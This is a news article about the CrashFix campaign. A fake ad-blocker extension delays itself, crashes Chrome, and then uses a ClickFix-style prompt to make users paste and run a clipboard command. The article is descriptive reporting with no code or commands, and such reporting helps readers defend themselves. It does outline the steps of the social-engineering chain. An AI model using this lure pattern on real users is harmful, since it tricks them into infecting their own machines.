How a Fake Ad Blocker Can Crash Your Browser and Spread Malware

Security researchers have discovered a new and dangerous malware campaign that tricks users by crashing their web browsers on purpose. This attack uses fake browser extensions, social engineering tricks, and remote access tools to push users into downloading harmful software.

Experts say this campaign, called CrashFix, shows how phishing methods are becoming more advanced and can also look similar to insider threat behavior.

The CrashFix attack starts with a fake browser extension named NexShield, which pretends to be a helpful tool such as an ad blocker. Once a user installs it, the extension secretly connects to nexsnield[.]com, a misspelled website made to look real. This site records when the extension is installed, updated, or removed.

To avoid suspicion, the extension stays inactive for 60 minutes using Chrome’s built-in Alarms API. After this delay, it begins its attack by repeatedly opening internal browser connections. This uses up system resources very fast, causing the browser to freeze and crash.

When the user opens the browser again, a pop-up appears saying that Chrome stopped unexpectedly. The message then gives fake instructions to stop future crashes. The user is told to press Win+R, then Ctrl+V, and press Enter. This trick is known as the ClickFix technique.

What the user does not know is that a harmful PowerShell or command prompt instruction has already been copied to the clipboard. By following the steps, the user unknowingly runs the command themselves, which infects their system.

Security experts say there are some common warning signs of malware infection. These include sudden syncing of company data to personal cloud accounts, unusual USB activity, and encrypted files stored in strange locations. These signs can suggest that data theft is being prepared.

Although CrashFix mainly targets users through fake extensions and browser crashes, companies also look for insider risk signals. Reports show that 73% of organizations experienced at least one insider-related incident in 2025, proving how common and costly these threats are.

Users are advised to avoid downloading files from unexpected pop-ups, especially those claiming to fix automatic problems. In their advisory, researchers wrote:

“Home users on standalone workstations receive a separate infection chain that appears to still be in testing. When we finally got through all the layers, the [command-and-control server, or C2] responded with, ‘TEST PAYLOAD!!!!’”

Experts say this may mean home users are not the main focus yet, or the attack is still being developed. However, it is clear that KongTuke is improving its methods and paying more attention to company networks.

KongTuke, also known as 404 TDS, LandUpdate808, and TAG-124, is a powerful Traffic Distribution System. By late 2025, it had become one of the most widely used tools for spreading malware.

Recent studies show that malicious browser extensions are increasing across all major browsers. Attackers hide spying tools, backdoors, and remote access features inside extensions that look safe. Many of these extensions watch user activity or crash browsers to force risky actions before delivering malware.

Researchers from Huntress said, “KongTuke clearly plays favorites with their victims. Domain-joined machines, typically corporate endpoints with access to Active Directory, internal resources, and sensitive data, get the VIP treatment,”
“Either the home user branch is still under development, or KongTuke is saving their best toys for corporate targets where the ROI on a successful compromise is significantly higher.”

While CrashFix is an external cyber threat, experts say organizations must also focus on internal risks. Protecting systems from misuse by employees or contractors is now just as important as stopping outside attackers.

Read More: Realme P4 Power set to launch next week – check prices